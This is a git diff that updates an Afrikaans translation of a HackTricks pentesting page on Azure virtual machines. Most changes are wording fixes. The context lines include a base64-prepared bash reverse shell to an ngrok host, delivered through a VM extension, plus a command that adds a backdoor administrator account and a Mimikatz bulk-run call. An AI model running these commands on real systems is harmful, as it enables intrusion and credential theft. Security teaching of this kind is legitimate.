mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-01-10 20:23:28 -08:00
Translated ['src/pentesting-cloud/aws-security/aws-services/aws-cognito-
This commit is contained in:
@@ -12,20 +12,20 @@ az-azure-network.md
|
||||
|
||||
## VMs Basiese inligting
|
||||
|
||||
Azure Virtuele Masjiene (VMs) is buigsaam, op aanvraag **cloud-gebaseerde bedieners wat jou toelaat om Windows of Linux bedryfstelsels te draai**. Hulle stel jou in staat om toepassings en werklas te ontplooi sonder om fisiese hardeware te bestuur. Azure VMs kan gekonfigureer word met verskillende CPU, geheue, en stoor opsies om spesifieke behoeftes te vervul en te integreer met Azure dienste soos virtuele netwerke, stoor, en sekuriteitsinstrumente.
|
||||
Azure Virtuele Masjiene (VMs) is buigsaam, op aanvraag **cloud-gebaseerde bedieners wat jou toelaat om Windows of Linux bedryfstelsels te draai**. Hulle stel jou in staat om toepassings en werklas te ontplooi sonder om fisiese hardeware te bestuur. Azure VMs kan gekonfigureer word met verskillende CPU, geheue, en stoor opsies om spesifieke behoeftes te voldoen en te integreer met Azure dienste soos virtuele netwerke, stoor, en sekuriteitsinstrumente.
|
||||
|
||||
### Sekuriteitskonfigurasies
|
||||
|
||||
- **Beschikbaarheidsgebiede**: Beschikbaarheidsgebiede is afsonderlike groepe datacenters binne 'n spesifieke Azure streek wat fisies geskei is om die risiko te minimaliseer dat verskeie gebiede deur plaaslike onderbrekings of rampe geraak word.
|
||||
- **Sekuriteitstipe**:
|
||||
- **Standaard Sekuriteit**: Dit is die standaard sekuriteitstipe wat nie enige spesifieke konfigurasie vereis nie.
|
||||
- **Vertroude Ontplooiing**: Hierdie sekuriteitstipe verbeter beskerming teen opstartkits en kernel-vlak malware deur Secure Boot en Virtual Trusted Platform Module (vTPM) te gebruik.
|
||||
- **Vertroude Ontplooiing**: Hierdie sekuriteitstipe verbeter beskerming teen opstartkits en kernvlak malware deur Secure Boot en Virtual Trusted Platform Module (vTPM) te gebruik.
|
||||
- **Vertrouelike VMs**: Bo-op 'n vertroude ontplooiing, bied dit hardeware-gebaseerde isolasie tussen die VM, hypervisor en gasheerbestuur, verbeter die skyfversleuteling en [**meer**](https://learn.microsoft.com/en-us/azure/confidential-computing/confidential-vm-overview)**.**
|
||||
- **Verifikasie**: Standaard word 'n nuwe **SSH-sleutel gegenereer**, alhoewel dit moontlik is om 'n publieke sleutel te gebruik of 'n vorige sleutel te gebruik en die gebruikersnaam is standaard **azureuser**. Dit is ook moontlik om te konfigureer om 'n **wagwoord** te gebruik.
|
||||
- **VM skyfversleuteling:** Die skyf is standaard versleuteld wanneer dit rus met 'n platform bestuurde sleutel.
|
||||
- Dit is ook moontlik om **Versleuteling by die gasheer** in te skakel, waar die data in die gasheer versleuteld sal word voordat dit na die stoor diens gestuur word, wat 'n einde-tot-einde versleuteling tussen die gasheer en die stoor diens verseker ([**docs**](https://learn.microsoft.com/en-gb/azure/virtual-machines/disk-encryption#encryption-at-host---end-to-end-encryption-for-your-vm-data)).
|
||||
- **NIC netwerk sekuriteitsgroep**:
|
||||
- **Geen**: Basies elke poort oopmaak
|
||||
- **Geen**: Basies maak elke poort oop
|
||||
- **Basies**: Laat toe om die inkomende poorte HTTP (80), HTTPS (443), SSH (22), RDP (3389) maklik oop te maak
|
||||
- **Geavanceerd**: Kies 'n sekuriteitsgroep
|
||||
- **Rugsteun**: Dit is moontlik om **Standaard** rugsteun (een per dag) en **Verbeterde** (meerdere per dag) in te skakel
|
||||
@@ -45,12 +45,12 @@ Azure Virtuele Masjiene (VMs) is buigsaam, op aanvraag **cloud-gebaseerde bedien
|
||||
|
||||
## Skywe & snappings
|
||||
|
||||
- Dit is moontlik om **'n skyf aan 2 of meer VMs te koppel**
|
||||
- Dit is moontlik om **te aktiveer om 'n skyf aan 2 of meer VMs te koppel**
|
||||
- Standaard is elke skyf **versleuteld** met 'n platform sleutel.
|
||||
- Dieselfde in snappings
|
||||
- Standaard is dit moontlik om **die skyf van alle netwerke te deel**, maar dit kan ook **beperk** word tot slegs sekere **privaat toegang** of om **publieke en private toegang heeltemal te deaktiveer**.
|
||||
- Dieselfde in snappings
|
||||
- Dit is moontlik om **'n SAS URI** (maks 60 dae) te **genereer om die skyf te eksporteer**, wat gekonfigureer kan word om verifikasie te vereis of nie
|
||||
- Dit is moontlik om 'n **SAS URI** (maks 60 dae) te **genereer om die skyf te eksporteer**, wat gekonfigureer kan word om verifikasie te vereis of nie
|
||||
- Dieselfde in snappings
|
||||
|
||||
{{#tabs}}
|
||||
@@ -76,10 +76,10 @@ Get-AzDisk -Name <DiskName> -ResourceGroupName <ResourceGroupName>
|
||||
|
||||
## Beelde, Galery Beelde & Herstelpunte
|
||||
|
||||
'n **VM beeld** is 'n sjabloon wat die bedryfstelsel, toepassingsinstellings en lêerstelsel bevat wat nodig is om 'n **nuwe virtuele masjien (VM)** te **skep**. Die verskil tussen 'n beeld en 'n skyf-snapshot is dat 'n skyf-snapshot 'n lees-alleen, punt-in-tyd kopie van 'n enkele bestuurde skyf is, wat hoofsaaklik vir rugsteun of probleemoplossing gebruik word, terwyl 'n beeld **meerdere skywe kan bevat en ontwerp is om as 'n sjabloon vir die skep van nuwe VM's te dien**.\
|
||||
'n **VM beeld** is 'n sjabloon wat die bedryfstelsel, toepassingsinstellings en lêerstelsel bevat wat nodig is om 'n **nuwe virtuele masjien (VM)** te **skep**. Die verskil tussen 'n beeld en 'n skyf-snapshot is dat 'n skyf-snapshot 'n lees-alleen, punt-in-tyd kopie van 'n enkele bestuurde skyf is, wat hoofsaaklik vir rugsteun of probleemoplossing gebruik word, terwyl 'n beeld **meerdere skywe kan bevat en ontwerp is om as 'n sjabloon te dien vir die skep van nuwe VM's**.\
|
||||
Beelde kan bestuur word in die **Beelde afdeling** van Azure of binne **Azure rekenaar galerye** wat dit moontlik maak om **weergawe** te genereer en die beeld oor huurders te **deel** of selfs dit publiek te maak.
|
||||
|
||||
'n **herstelpunt** stoor die VM-konfigurasie en **punt-in-tyd** toepassings-konsistente **snapshots van al die bestuurde skywe** wat aan die VM gekoppel is. Dit is verwant aan die VM en die doel daarvan is om daardie VM te kan herstel na hoe dit was op daardie spesifieke punt in tyd.
|
||||
'n **herstelpunt** stoor die VM-konfigurasie en **punt-in-tyd** toepassings-konsistente **snapshots van al die bestuurde skywe** wat aan die VM gekoppel is. Dit is verwant aan die VM en die doel daarvan is om daardie VM te kan herstel na hoe dit was in daardie spesifieke punt in tyd.
|
||||
|
||||
{{#tabs}}
|
||||
{{#tab name="az cli"}}
|
||||
@@ -144,15 +144,15 @@ Get-AzRestorePointCollection -Name <CollectionName> -ResourceGroupName <Resource
|
||||
|
||||
## Azure Site Recovery
|
||||
|
||||
Van die [**docs**](https://learn.microsoft.com/en-us/azure/site-recovery/site-recovery-overview): Site Recovery help om besigheidskontinuitiet te verseker deur besigheidsprogramme en werklas aan die gang te hou tydens onderbrekings. Site Recovery **repliceer werklas** wat op fisiese en virtuele masjiene (VMs) van 'n primêre plek na 'n sekondêre ligging loop. Wanneer 'n onderbreking by jou primêre plek plaasvind, kan jy oor na 'n sekondêre ligging en toegang tot programme daar verkry. Nadat die primêre ligging weer aan die gang is, kan jy terugkeer na dit.
|
||||
Van die [**docs**](https://learn.microsoft.com/en-us/azure/site-recovery/site-recovery-overview): Site Recovery help om besigheidskontinuitiet te verseker deur besigheidsprogramme en werklas aan die gang te hou tydens onderbrekings. Site Recovery **repliceer werklas** wat op fisiese en virtuele masjiene (VMs) van 'n primêre plek na 'n sekondêre ligging loop. Wanneer 'n onderbreking by jou primêre plek plaasvind, kan jy oor na 'n sekondêre ligging, en toegang tot programme van daar. Nadat die primêre ligging weer aan die gang is, kan jy terugkeer na dit.
|
||||
|
||||
## Azure Bastion
|
||||
|
||||
Azure Bastion stel veilige en naatlose **Remote Desktop Protocol (RDP)** en **Secure Shell (SSH)** toegang tot jou virtuele masjiene (VMs) direk deur die Azure Portal of via 'n jump box. Dit **elimineer die behoefte aan publieke IP adresse** op jou VMs.
|
||||
Azure Bastion stel veilige en naatlose **Remote Desktop Protocol (RDP)** en **Secure Shell (SSH)** toegang tot jou virtuele masjiene (VMs) direk deur die Azure Portal of via 'n jump box. Deur **die behoefte aan publieke IP adresse** op jou VMs te verwyder.
|
||||
|
||||
Die Bastion ontplooi 'n subnet genaamd **`AzureBastionSubnet`** met 'n `/26` netmask in die VNet waarin dit moet werk. Dan laat dit toe om **verbinding te maak met interne VMs deur die blaaier** met behulp van `RDP` en `SSH` sonder om poorte van die VMs aan die Internet bloot te stel. Dit kan ook as 'n **jump host** werk.
|
||||
Die Bastion ontplooi 'n subnet genaamd **`AzureBastionSubnet`** met 'n `/26` netmask in die VNet waarin dit moet werk. Dan, dit laat toe om **verbinding te maak met interne VMs deur die blaaiers** met behulp van `RDP` en `SSH` sonder om poorte van die VMs aan die Internet bloot te stel. Dit kan ook as 'n **jump host** werk.
|
||||
|
||||
Om al die Azure Bastion Hosts in jou subskripsie te lys en om met VMs deur hulle te verbind, kan jy die volgende opdragte gebruik:
|
||||
Om al die Azure Bastion Hosts in jou subskripsie te lys en met VMs deur hulle te verbind, kan jy die volgende opdragte gebruik:
|
||||
|
||||
{{#tabs}}
|
||||
{{#tab name="az cli"}}
|
||||
@@ -189,7 +189,7 @@ Get-AzBastion
|
||||
|
||||
## Metadata
|
||||
|
||||
Die Azure Instans Metadata-diens (IMDS) **verskaf inligting oor lopende virtuele masjieninstansies** om te help met hul bestuur en konfigurasie. Dit bied besonderhede soos die SKU, stoor, netwerk konfigurasies, en inligting oor komende onderhoudsgeleenthede via **REST API beskikbaar by die nie-routable IP-adres 169.254.169.254**, wat slegs vanaf binne die VM toeganklik is. Kommunikasie tussen die VM en IMDS bly binne die gasheer, wat veilige toegang verseker. Wanneer daar na IMDS gevra word, moet HTTP-kliente binne die VM web-proxies omseil om behoorlike kommunikasie te verseker.
|
||||
Die Azure Instans Metadata-diens (IMDS) **verskaf inligting oor lopende virtuele masjieninstansies** om te help met hul bestuur en konfigurasie. Dit bied besonderhede soos die SKU, stoor, netwerk konfigurasies, en inligting oor komende onderhoudsgeleenthede via **REST API beskikbaar by die nie-routable IP adres 169.254.169.254**, wat slegs vanaf binne die VM toeganklik is. Kommunikasie tussen die VM en IMDS bly binne die gasheer, wat veilige toegang verseker. Wanneer daar na IMDS gevra word, moet HTTP-kliënte binne die VM web-proxies omseil om behoorlike kommunikasie te verseker.
|
||||
|
||||
Boonop, om die metadata-eindpunt te kontak, moet die HTTP-versoek die koptekst **`Metadata: true`** hê en mag nie die koptekst **`X-Forwarded-For`** hê nie.
|
||||
|
||||
@@ -462,7 +462,7 @@ Dit is moontlik om **aangepaste uitbreidings te loop wat aangepaste kode uitvoer
|
||||
{{#tabs }}
|
||||
{{#tab name="Linux" }}
|
||||
|
||||
- Voer 'n terugshell uit
|
||||
- Voer 'n omgekeerde shell uit
|
||||
```bash
|
||||
# Prepare the rev shell
|
||||
echo -n 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64
|
||||
@@ -522,7 +522,7 @@ az vm extension set \
|
||||
```
|
||||
U kan ook ander payloads uitvoer soos: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add`
|
||||
|
||||
- Stel wagwoord terug met behulp van die VMAccess-uitbreiding
|
||||
- Stel wagwoord weer in met behulp van die VMAccess-uitbreiding
|
||||
```bash
|
||||
# Run VMAccess extension to reset the password
|
||||
$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
|
||||
@@ -739,7 +739,7 @@ echo "Hello World" > /var/tmp/output.txt
|
||||
```
|
||||
### **Voer Opdrag Uit**
|
||||
|
||||
Dit is die mees basiese meganisme wat Azure bied om **arbitraire opdragte in VMs uit te voer**. Die nodige toestemming is `Microsoft.Compute/virtualMachines/runCommand/action`.
|
||||
Dit is die mees basiese mechanisme wat Azure bied om **arbitraire opdragte in VMs uit te voer**. Die nodige toestemming is `Microsoft.Compute/virtualMachines/runCommand/action`.
|
||||
|
||||
{{#tabs }}
|
||||
{{#tab name="Linux" }}
|
||||
@@ -793,7 +793,7 @@ Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
|
||||
## Unauthenticated Access
|
||||
|
||||
{{#ref}}
|
||||
../../az-unauthenticated-enum-and-initial-entry/az-vms-unath.md
|
||||
../../az-unauthenticated-enum-and-initial-entry/az-vms-unauth.md
|
||||
{{#endref}}
|
||||
|
||||
## Post Exploitation
|
||||
|
||||
Reference in New Issue
Block a user